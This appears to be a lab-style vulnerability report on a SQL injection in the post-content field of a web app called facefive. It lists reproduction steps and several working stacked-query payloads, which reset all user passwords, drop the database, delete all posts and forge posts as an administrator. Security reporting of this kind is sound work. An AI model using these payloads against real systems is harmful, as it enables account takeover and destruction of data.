# Vulnerability 1: SQL Injection in create post form allows for executing of any number of queries

- Vulnerability: SQL Injection
- Where: `content` field
- Impact: Allows to execute any number of queries in the database

## Steps to reproduce

1. Register a user
2. Go to `New Post`
3. Insert `', 1); UPDATE Users SET password='123' WHERE 1=1 ; DROP TABLE posts # `
4. Logout
5. Login to any user with password `123`

[(POC)](vuln1.py)

**Note:** The last instruction of the payload (`DROP TABLE posts`) is needed for the query to be executed, but since it has an error on purpose, it won't be executed

## Other payloads

- `', 1); DROP DATABASE facefivedb; DROP TABLE posts #` (allows for DoS)
- `', 1); DELETE FROM Posts WHERE 1=1; DROP TABLE posts #` (delete all posts)
- `', 1); INSERT INTO Posts (author, content, type) VALUES ('administrator', 'This is my new post', 1); DROP TABLE posts # ` (create new public post as `administrator`)
